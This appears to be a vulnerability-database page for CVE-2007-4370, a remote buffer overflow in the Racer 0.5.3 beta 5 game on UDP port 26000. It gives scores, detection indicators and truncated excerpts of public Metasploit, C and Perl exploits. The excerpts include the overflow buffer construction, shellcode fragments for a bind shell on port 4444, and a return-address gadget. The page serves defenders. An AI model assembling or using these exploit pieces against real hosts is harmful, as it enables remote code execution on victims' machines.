CVE-2007-4370
published 2007-08-15CVE-2007-4370: Multiple buffer overflows in the (1) client and (2) server in Racer 0.5.3 beta 5 allow remote attackers to execute arbitrary code via a long string to UDP port…
PriorityP352high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
59.20%
99.0th percentile
Multiple buffer overflows in the (1) client and (2) server in Racer 0.5.3 beta 5 allow remote attackers to execute arbitrary code via a long string to UDP port 26000.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| racer | racer | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandbuf = Rex::Text.rand_text_alphanumeric(1001); buf << [target.ret].pack('V'); buf << payload.encoded; buf << Rex::Text.rand_text_alphanumeric(1196 - payload.encoded.length); udp_sock.put(buf)↗
bytes↗
Run Calc.exe shellcode (alphanumeric encoded, 339 bytes): \xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49...
bytes↗
Bind shell on port 4444 shellcode (alphanumeric encoded, 238 bytes): \xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49...
- →Detect oversized UDP datagrams (>1000 bytes) sent to port 26000, which is the trigger condition for the buffer overflow in both the Racer client and server. ↗
- →The Metasploit module sends a 1001-byte alphanumeric random buffer followed by the return address and payload (total ~2197 bytes) over UDP/26000; alert on UDP/26000 datagrams exceeding 1000 bytes. ↗
- →The exploit payload uses AlphanumUpper encoding with bad characters \x5c and \x00; look for large all-uppercase alphanumeric UDP payloads on port 26000. ↗
- →The C exploit fills the packet buffer with repeated 'E' characters before appending the return address; a UDP/26000 payload consisting of a long run of 0x45 ('E') bytes is a strong indicator of exploitation. ↗
- →Post-exploitation, the bind-shell payload opens TCP port 4444 on the victim; monitor for unexpected listening services on port 4444 following inbound UDP/26000 traffic. ↗
- →The universal target uses a JMP ESP gadget in Fmodex.dll at 0x10073FB7; presence of this return address (bytes B7 3F 07 10) in a UDP/26000 payload indicates Metasploit exploitation. ↗
- ·The Metasploit module targets Windows only ('Platform' => 'win'); the NVD advisory notes both client and server are affected, so both processes on UDP/26000 are attack surfaces. ↗
- ·Payload space is limited to 1000 bytes with AlphanumUpper encoding required; larger or non-alphanumeric shellcode will not fit without adjustment. ↗
- ·The C exploit notes the vulnerability can be exploited using either a classic stack overflow (JMP ESP) or an SEH-based method, so detection should account for both exploitation techniques. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Racer 0.5.3 Beta 5 - Remote Buffer Overflow (Metasploit)
exploitdb·2010-09-20
CVE-2007-4370 Racer 0.5.3 Beta 5 - Remote Buffer Overflow (Metasploit)
Racer 0.5.3 Beta 5 - Remote Buffer Overflow (Metasploit)
---
##
# $Id: racer_503beta5.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Racer v0.5.3 beta 5 Buffer Overflow',
'Description' => %q{
This module explots the Racer Car and Racing Simulator game
versions v0.5.3 beta 5 and earlier. Both the client and server listen
on UDP port 26000. By sending an overly long buffer we are able to
execute arbitrary code remotely.
},
'Author' => [ 'Trancek ' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 103
Exploit-DB
Racer 0.5.3 Beta 5 - Remote Stack Buffer Overflow
exploitdb·2009-03-20
CVE-2007-4370 Racer 0.5.3 Beta 5 - Remote Stack Buffer Overflow
Racer 0.5.3 Beta 5 - Remote Stack Buffer Overflow
---
/*
Racer vs 0.5.3 beta 5 Remote Stack Buffer Overflow(C) exploit by fl0 fl0w
Description : Bug found some time ago by n00b (Cheers mate ! :D) ,I wanted to make a more
improved sploit , with lots of targets to chose from , and C yes is better :D.
Tested on Win Xp Pro Sp 3 ; Compile DevC++ 4.9.9.2
Command line arguments : -ip ->the ip of your target default is 127.0.0.1
-port ->default port is 26000
-shellcode ->well guess.. :D
What does the exploit do ?
You can run :Calc.exe, Bind shell on port 4444, Win32 Adduser
I've set the default port 26000 and ip 127.0.0.1 .
How to use ? Method ?
-t 10 -ip 127.0.0.1 -port 26000
Classic buffer overflow , just jump to the payload and done !
It can be exploited using SEH method too.
*/
#include
#i
Exploit-DB
Racer 0.5.3 Beta 5 - Remote Buffer Overflow
exploitdb·2007-08-13
CVE-2007-4370 Racer 0.5.3 Beta 5 - Remote Buffer Overflow
Racer 0.5.3 Beta 5 - Remote Buffer Overflow
---
#!/usr/bin/perl
###Credit's to n00b.
################################################
#Racer v0.5.3 beta 5 (12-03-07) remote exploit.
#Racer is also prone to a buffer over flow in the
#server and client.Automatically the game open's
#Udp port 26000 and is waiting for a msg buffer.
#If we send an overly long buffer we are able to
#Control the eip register and esp hold's enough
#buffer to have a good size shell code.
###############################################
#Tested: Win Xp sp2 English
#Vendor's web site: http://www.racer.nl/
#Affected version's: all version's.
#Tested on: Racer v0.5.3 beta 5 (12-03-07).
#Special thank's to str0ke.
###########################
print new(PeerAddr=>$ip,
PeerPort=>$port,
Proto=>$protocol,
Timeout=>'1') ||
Metasploit
Racer v0.5.3 Beta 5 Buffer Overflow
metasploit
Racer v0.5.3 Beta 5 Buffer Overflow
Racer v0.5.3 Beta 5 Buffer Overflow
This module exploits the Racer Car and Racing Simulator game versions v0.5.3 beta 5 and earlier. Both the client and server listen on UDP port 26000. By sending an overly long buffer we are able to execute arbitrary code remotely.
No writeups or analysis indexed.
http://osvdb.org/39601http://www.securityfocus.com/bid/25297https://exchange.xforce.ibmcloud.com/vulnerabilities/35991https://www.exploit-db.com/exploits/4283http://osvdb.org/39601http://www.securityfocus.com/bid/25297https://exchange.xforce.ibmcloud.com/vulnerabilities/35991https://www.exploit-db.com/exploits/4283
2007-08-15
Published